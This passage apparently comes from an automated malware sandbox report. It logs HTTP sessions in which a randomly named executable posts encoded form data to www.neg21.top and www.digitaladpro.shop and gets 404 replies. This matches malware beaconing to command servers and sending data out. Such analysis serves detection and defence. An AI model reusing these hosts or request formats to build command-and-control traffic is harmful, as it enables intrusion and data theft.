                                                                                                                            Data Raw: 6d 46 70 74 59 62 3d 51 53 77 36 67 52 37 30 45 69 77 31 77 46 58 62 62 33 78 4d 50 45 58 33 39 58 48 57 37 2f 79 76 34 69 7a 58 32 56 61 53 38 45 34 61 63 2f 67 4d 32 4b 72 30 77 6c 50 38 55 31 4a 32 57 2b 63 61 56 4c 76 71 4c 35 47 46 32 4d 6b 47 31 42 4d 6b 39 71 72 32 64 54 53 4b 4a 42 5a 38 78 47 37 42 5a 74 2f 38 58 75 6f 43 56 79 53 36 64 31 37 59 43 56 59 6a 73 43 42 77 6d 4a 4b 43 52 7a 4c 34 48 55 79 65 54 55 79 49 71 6e 32 66 6e 62 77 32 43 77 47 68 50 63 6b 69 6b 49 2b 32 39 47 57 4d 6a 42 45 6e 70 4e 6a 2f 31 74 5a 56 6b 54 4d 6f 55 2b 79 49 7a 71 4b 41 6d 37 57 63 67 45 6c 59 61 41 3d 3d
                                                                                                                            Data Ascii: mFptYb=QSw6gR70Eiw1wFXbb3xMPEX39XHW7/yv4izX2VaS8E4ac/gM2Kr0wlP8U1J2W+caVLvqL5GF2MkG1BMk9qr2dTSKJBZ8xG7BZt/8XuoCVyS6d17YCVYjsCBwmJKCRzL4HUyeTUyIqn2fnbw2CwGhPckikI+29GWMjBEnpNj/1tZVkTMoU+yIzqKAm7WcgElYaA==


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            44192.168.2.2249205206.119.81.3680652C:\Program Files (x86)\eWGLawkqDiAOqdkyBWluAHEihTmqqLNFDyAuJkZZhXXrFySCHcAnMJbhGo\AhEyCWkdTLz.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            Nov 7, 2024 10:52:46.181489944 CET2472OUTPOST /1i1f/ HTTP/1.1
                                                                                                                            Host: www.neg21.top
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                            Accept-Language: en-US,en;q=0.5
                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                            Origin: http://www.neg21.top
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Cache-Control: no-cache
                                                                                                                            Connection: close
                                                                                                                            Content-Length: 3627
                                                                                                                            Referer: http://www.neg21.top/1i1f/
                                                                                                                            User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A1040 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
                                                                                                                            Data Raw: 6d 46 70 74 59 62 3d 51 53 77 36 67 52 37 30 45 69 77 31 79 6d 50 62 5a 51 6c 4d 4e 6b 58 77 34 58 48 57 69 76 79 72 34 69 2f 58 32 51 36 43 38 32 55 61 63 75 77 4d 32 73 2f 30 79 6c 50 38 44 6c 4a 36 59 65 63 79 56 4e 44 63 4c 38 36 4b 32 4f 6f 47 30 69 30 6b 31 49 44 31 57 44 53 49 4e 42 5a 2f 78 47 36 56 5a 75 48 77 58 75 74 76 56 79 4b 36 65 41 50 59 53 6c 59 67 6d 69 42 77 6d 4a 4b 4f 52 7a 4b 72 48 55 36 47 54 56 71 59 70 55 75 66 67 36 51 32 4f 33 53 75 47 38 6c 70 36 59 2f 63 30 6b 6d 47 36 78 4a 72 6e 62 66 69 36 5a 74 6b 35 52 41 53 55 39 4f 43 6e 34 2b 62 34 63 72 4e 74 6d 51 51 4b 34 2f 70 65 6c 72 51 61 44 30 51 62 56 43 74 78 45 62 66 6f 6a 49 43 46 4e 78 6b 69 56 78 32 41 66 6e 46 5a 78 4b 69 6a 63 42 30 63 52 64 48 74 33 43 7a 6d 77 5a 4e 33 71 63 2b 4c 43 6b 75 54 33 51 6f 42 71 67 6e 4a 4a 42 69 52 67 79 69 4e 31 32 6c 41 74 62 2f 35 75 71 39 50 74 77 6b 62 68 55 76 70 53 31 64 54 75 54 54 33 47 39 68 54 48 52 39 61 4c 4b 33 6e 30 39 50 54 48 58 55 37 4f 2b 6e 78 53 67 76 78 6a 4b [TRUNCATED]
                                                                                                                            Data Ascii: mFptYb=QSw6gR70Eiw1ymPbZQlMNkXw4XHWivyr4i/X2Q6C82UacuwM2s/0ylP8DlJ6YecyVNDcL86K2OoG0i0k1ID1WDSINBZ/xG6VZuHwXutvVyK6eAPYSlYgmiBwmJKORzKrHU6GTVqYpUufg6Q2O3SuG8lp6Y/c0kmG6xJrnbfi6Ztk5RASU9OCn4+b4crNtmQQK4/pelrQaD0QbVCtxEbfojICFNxkiVx2AfnFZxKijcB0cRdHt3CzmwZN3qc+LCkuT3QoBqgnJJBiRgyiN12lAtb/5uq9PtwkbhUvpS1dTuTT3G9hTHR9aLK3n09PTHXU7O+nxSgvxjKLgjc8IbMQa6vc8Tp65cpkbw2ZKb4zg0nHvz9Ydath6kXt36E9pAHU7wuB3DxBqqQ4QNDS+RVm6jR8Q5SGue/aHitb6OhaWIvBPXyx/tfq7cjovhJgnrr3PCnzuPZ9ADLW62DhkGyvl4RVBPTjoVLzwXs9zzm/+5G4kLgCTL0dlwt1vFoihxNDAZ2+ghHOYASCiV/zWGHOScEivMLNxdoXDJGNk1eCcarV2+AGtOAA4sdfyxdiwmZD3wWqVBwGhhCpe/wPAeUV70bebb7hlfni3zJ4JNj7Tm4Uj8YvImSyCKMsD0DU/l8H4p/FWeaUQVMl8ut64YzEfAbdemZ976ivpnpfHBKJ/byayFV4U7pbSX1cIoAVeQYPtOtmRervXiHHW6tkNi4vtbVbXdp6OAv5Cics3N5raWxqZ3nxlL2D4onG0huWbJWJfg/6/TvnOpaIXJNyUf3w4RvcHUScCI1MyCxFvpfJf1Za9oOWNkycR41tbRCzUC7nt1HiA3l6fMyZEnxJN+DProyWLlx0ybJ8Rg9xlfkxvHmkXXYoXWKx99TcDa9UbLCnmV8NiYOxzf7zfIh2DJIF1fUsAt1m8M08sEKbLEQq6BemAQIRym3UFMNMeXQ+zbpSx+37fCvY8i9B8zd8W3QYI6pKPrTvi5pAeIM6I2XEckjrJ [TRUNCATED]


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            45192.168.2.2249206206.119.81.3680652C:\Program Files (x86)\eWGLawkqDiAOqdkyBWluAHEihTmqqLNFDyAuJkZZhXXrFySCHcAnMJbhGo\AhEyCWkdTLz.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            Nov 7, 2024 10:52:48.719984055 CET527OUTGET /1i1f/?mFptYb=dQYajm//Sx1stwXHfz91EBXSzFfr0PyC8xP2ywW2sRY4KNcSndLg20S7F1cIbOwwYrPcKp2sut8M/zk+pKvqB0TIHTxz9Wrof9/BUM8Hdiu6WBCEYXAcnBVSoJf5&Vta=nFypuDtholF HTTP/1.1
                                                                                                                            Host: www.neg21.top
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                            Accept-Language: en-US,en;q=0.5
                                                                                                                            Connection: close
                                                                                                                            User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A1040 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
                                                                                                                            Nov 7, 2024 10:52:49.702600956 CET691INHTTP/1.1 404 Not Found
                                                                                                                            Server: nginx
                                                                                                                            Date: Thu, 07 Nov 2024 09:52:49 GMT
                                                                                                                            Content-Type: text/html
                                                                                                                            Content-Length: 548
                                                                                                                            Connection: close
                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                                                                                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            46192.168.2.2249207142.250.185.11580652C:\Program Files (x86)\eWGLawkqDiAOqdkyBWluAHEihTmqqLNFDyAuJkZZhXXrFySCHcAnMJbhGo\AhEyCWkdTLz.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            Nov 7, 2024 10:52:55.276846886 CET2472OUTPOST /m6se/ HTTP/1.1
                                                                                                                            Host: www.digitaladpro.shop
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                            Accept-Language: en-US,en;q=0.5
                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                            Origin: http://www.digitaladpro.shop
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Cache-Control: no-cache
                                                                                                                            Connection: close
                                                                                                                            Content-Length: 2163
                                                                                                                            Referer: http://www.digitaladpro.shop/m6se/
                                                                                                                            User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A1040 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
                                                                                                                            Data Raw: 6d 46 70 74 59 62 3d 67 72 6a 79 67 6a 42 7a 4e 65 59 41 4c 6e 64 53 70 6b 53 79 41 39 58 45 4a 57 6c 79 75 41 4e 42 70 61 5a 74 6e 69 76 67 6b 53 36 4f 44 50 66 46 30 62 6c 46 32 5a 61 34 4c 6d 38 41 6a 68 4d 76 54 46 49 6e 43 79 71 35 78 35 6c 58 71 35 6c 59 74 6c 34 4c 76 4f 47 65 66 62 67 57 54 42 70 4d 76 68 30 37 52 6e 69 67 42 53 49 54 41 78 48 4b 55 51 7a 4a 75 32 56 4b 45 64 2b 56 78 68 68 38 6e 72 49 2b 69 46 46 6d 53 4c 54 6b 35 73 39 2f 62 4a 6b 77 2f 6a 6f 4e 53 7a 61 35 63 66 51 74 6e 46 30 4b 53 35 2b 7a 4a 39 6c 5a 49 77 49 65 6b 76 73 62 68 6a 31 48 4b 42 37 33 46 34 76 61 68 35 47 79 47 36 75 35 61 57 58 69 7a 35 4e 4d 41 57 4a 38 57 51 42 79 31 55 4a 4b 77 78 72 72 2b 55 46 6a 73 33 52 49 4e 52 51 49 47 47 75 56 39 77 36 35 2f 74 31 69 65 53 33 4b 44 5a 4c 30 38 64 78 65 78 64 4c 6e 44 34 42 52 64 6c 6e 36 65 7a 4c 32 79 33 5a 49 38 71 6d 4d 4a 39 78 30 33 64 4b 30 75 4c 6d 70 38 2f 64 6a 32 6b 6e 55 76 71 68 72 4d 69 39 4e 33 79 69 38 31 58 39 41 62 37 43 6c 41 38 55 35 4d 43 5a [TRUNCATED]
                                                                                                                            Data Ascii: mFptYb=grjygjBzNeYALndSpkSyA9XEJWlyuANBpaZtnivgkS6ODPfF0blF2Za4Lm8AjhMvTFInCyq5x5lXq5lYtl4LvOGefbgWTBpMvh07RnigBSITAxHKUQzJu2VKEd+Vxhh8nrI+iFFmSLTk5s9/bJkw/joNSza5cfQtnF0KS5+zJ9lZIwIekvsbhj1HKB73F4vah5GyG6u5aWXiz5NMAWJ8WQBy1UJKwxrr+UFjs3RINRQIGGuV9w65/t1ieS3KDZL08dxexdLnD4BRdln6ezL2y3ZI8qmMJ9x03dK0uLmp8/dj2knUvqhrMi9N3yi81X9Ab7ClA8U5MCZDvexAUMBCR8mJXjUxAkdzrry7ZKItQr5Ni0GPeSbNuFNiJXZJvSB9vSNx1AkLc0ctnQ1+OFsqTIig30/IsaFWM/3gwDJsk9sPycAzqviwzPpoKvNcpwCo3Ruk3kVTD69flGu+Lg6NkClWz/7caJO5YbYEo9PGCuYqUUJc7OjmhJx8yl6IMkg+AlGaehNQfsQRIhZBPaArn8wNlxZycaoaF7asiDvkZP15ffdoCXP6NMDKbK35JKO0l2+AF+SEzpMvIDFFGZmaaekoQ+SMpn327/Pas/n5djBDyPgpNPLWR5nnWhSkHD9HXtl+5et4kEBJrhDUN01mzmgfd5AbPJtinyGWNK3Dkb8bV+rXmRCVvJ7EYn/9+ZIu9+eIjm1oL83xqCrnMlawk9Npbf+czARX3DREBLpdgkMDYIle9QxPUluhS8aWDbZxkANDizkl9zSdC6VTGOyUjEQIdSq/i0lbkjURRCrow6Np/WgNGLLzsF1mqSIk4sGE2Dg40ETl1+2RiQtSdKllxqBI4qIFYaayx1fnnZ13laRs0zZYUWxQWMZl4arvONFWkPRlZQQ5qcSRYPHGyAHFlBKIBLForGkNNVa9s/4/gPWCx6rnLELg7L6daxbgPwOIdfdvX7orFKzbtupikNRUi3HgSRiIHcFwHxyfuqznvWaXA [TRUNCATED]
                                                                                                                            Nov 7, 2024 10:52:55.281765938 CET294OUTData Raw: 66 79 4a 43 79 75 2b 77 74 64 34 71 4d 38 43 75 76 2f 6e 42 4f 42 56 59 56 4e 65 56 50 51 4a 34 42 54 46 31 73 4d 78 77 47 7a 65 78 2b 4a 53 2b 49 6d 63 66 50 62 63 4d 6c 55 66 4c 46 63 39 52 32 33 4f 45 79 6d 4a 70 37 4e 74 79 5a 6a 4f 53 74 44
                                                                                                                            Data Ascii: fyJCyu+wtd4qM8Cuv/nBOBVYVNeVPQJ4BTF1sMxwGzex+JS+ImcfPbcMlUfLFc9R23OEymJp7NtyZjOStDUN6ZiucTrcaslIx76nsGorpBZJFqoGjDvHHZbGSnkTYOGZ6sPXu3envvUJ3ze4uOak2q5Ok0ltXqRvDYu8/mcd9dGbbVnai6IIOZrNSzM+U3JAoJIgFAMDLclGMqbnBa151WDQHH3EvhlIESs7ApOUcJycOLGYaKD
                                                                                                                            Nov 7, 2024 10:52:56.137284994 CET1236INHTTP/1.1 404 Not Found
                                                                                                                            Date: Thu, 07 Nov 2024 09:52:55 GMT
                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                            Server: ghs
                                                                                                                            Content-Length: 1566
                                                                                                                            X-XSS-Protection: 0
                                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                                            Connection: close
                                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                                                                                            Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                                                                            Nov 7, 2024 10:52:56.137314081 CET537INData Raw: 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 30 7d 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d
                                                                                                                            Data Ascii: oglelogo/2x/googlelogo_color_150x54dp.png) 0}}@media only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 1


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            47192.168.2.2249208142.250.185.11580652C:\Program Files (x86)\eWGLawkqDiAOqdkyBWluAHEihTmqqLNFDyAuJkZZhXXrFySCHcAnMJbhGo\AhEyCWkdTLz.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            Nov 7, 2024 10:52:57.822489977 CET805OUTPOST /m6se/ HTTP/1.1
                                                                                                                            Host: www.digitaladpro.shop
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                            Accept-Language: en-US,en;q=0.5
                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                            Origin: http://www.digitaladpro.shop
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Cache-Control: no-cache
                                                                                                                            Connection: close
                                                                                                                            Content-Length: 203
                                                                                                                            Referer: http://www.digitaladpro.shop/m6se/
                                                                                                                            User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A1040 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
                                                                                                                            Data Raw: 6d 46 70 74 59 62 3d 67 72 6a 79 67 6a 42 7a 4e 65 59 41 4c 6b 31 53 70 32 36 79 42 64 58 45 46 32 6c 79 6b 67 4e 62 70 62 6c 6c 6e 6a 72 77 6b 6c 47 4f 41 65 76 46 31 6f 42 46 78 5a 61 33 66 57 38 45 74 42 4d 41 54 46 49 56 43 79 47 35 78 35 78 58 70 61 4e 59 72 6b 34 49 70 4f 47 63 58 37 67 54 54 42 6c 2f 76 68 34 56 52 6e 4b 67 42 51 73 54 47 42 58 4b 51 79 62 4a 2b 32 56 54 50 39 2b 43 78 68 73 6d 6e 76 73 32 69 45 70 6d 53 36 2f 6b 34 35 42 2f 66 61 63 77 6d 54 6f 4d 4b 6a 62 59 58 4d 4a 67 74 31 41 43 5a 71 32 70 4a 73 64 6c 4a 42 6b 6c 39 66 55 6d 32 6d 70 34 58 48 57 61 41 34 43 51 7a 67 3d 3d
                                                                                                                            Data Ascii: mFptYb=grjygjBzNeYALk1Sp26yBdXEF2lykgNbpbllnjrwklGOAevF1oBFxZa3fW8EtBMATFIVCyG5x5xXpaNYrk4IpOGcX7gTTBl/vh4VRnKgBQsTGBXKQybJ+2VTP9+Cxhsmnvs2iEpmS6/k45B/facwmToMKjbYXMJgt1ACZq2pJsdlJBkl9fUm2mp4XHWaA4CQzg==
                                                                                                                            Nov 7, 2024 10:52:58.647708893 CET1236INHTTP/1.1 404 Not Found
                                                                                                                            Date: Thu, 07 Nov 2024 09:52:58 GMT
                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                            Server: ghs
                                                                                                                            Content-Length: 1566
                                                                                                                            X-XSS-Protection: 0
                                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                                            Connection: close
                                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                                                                                            Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                                                                            Nov 7, 2024 10:52:58.648230076 CET537INData Raw: 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 30 7d 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d
                                                                                                                            Data Ascii: oglelogo/2x/googlelogo_color_150x54dp.png) 0}}@media only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 1


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            48192.168.2.2249209142.250.185.11580652C:\Program Files (x86)\eWGLawkqDiAOqdkyBWluAHEihTmqqLNFDyAuJkZZhXXrFySCHcAnMJbhGo\AhEyCWkdTLz.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            Nov 7, 2024 10:53:00.360677958 CET2472OUTPOST /m6se/ HTTP/1.1
                                                                                                                            Host: www.digitaladpro.shop
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                            Accept-Language: en-US,en;q=0.5
                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                            Origin: http://www.digitaladpro.shop
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Cache-Control: no-cache
                                                                                                                            Connection: close
                                                                                                                            Content-Length: 3627
                                                                                                                            Referer: http://www.digitaladpro.shop/m6se/
                                                                                                                            User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A1040 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
                                                                                                                            Data Raw: 6d 46 70 74 59 62 3d 67 72 6a 79 67 6a 42 7a 4e 65 59 41 5a 30 46 53 72 52 4f 79 4a 64 58 48 4c 57 6c 79 75 41 4e 48 70 61 5a 6c 6e 69 76 67 6b 54 32 4f 44 4d 48 46 30 4c 6c 46 33 5a 61 33 49 6d 38 41 6a 68 4d 6f 54 46 4d 4f 43 79 33 62 78 37 64 58 71 37 64 59 74 6d 51 4c 6d 75 47 65 54 37 67 51 54 42 6b 6c 76 68 6f 52 52 68 58 37 42 51 6b 54 47 54 50 4b 45 53 62 4f 67 6d 56 54 50 39 2b 4f 78 68 73 47 6e 72 41 75 69 42 45 37 53 4e 48 6b 35 63 39 2f 54 5a 6b 7a 33 44 6f 49 57 7a 61 33 63 66 73 2b 6e 46 30 4f 53 35 71 4e 4a 39 70 5a 4a 6d 30 65 6b 73 30 59 2f 44 31 49 58 78 37 33 42 34 76 55 68 35 48 74 47 36 75 35 61 56 44 69 7a 70 4e 4d 41 54 39 37 56 67 42 79 38 30 4a 4e 39 52 6d 51 2b 55 41 45 73 33 68 59 4e 69 38 49 48 45 47 56 73 77 36 35 34 64 30 6e 65 53 33 39 61 4a 4b 58 38 64 70 73 78 63 36 67 44 34 42 52 64 67 7a 36 61 68 7a 32 6b 58 5a 49 7a 4b 6d 4e 41 64 78 33 33 64 65 61 75 4b 43 70 38 2b 46 6a 33 57 2f 55 2b 34 4a 6f 44 43 39 4d 7a 79 69 79 78 58 38 61 62 37 65 44 41 38 63 66 4d 42 52 [TRUNCATED]
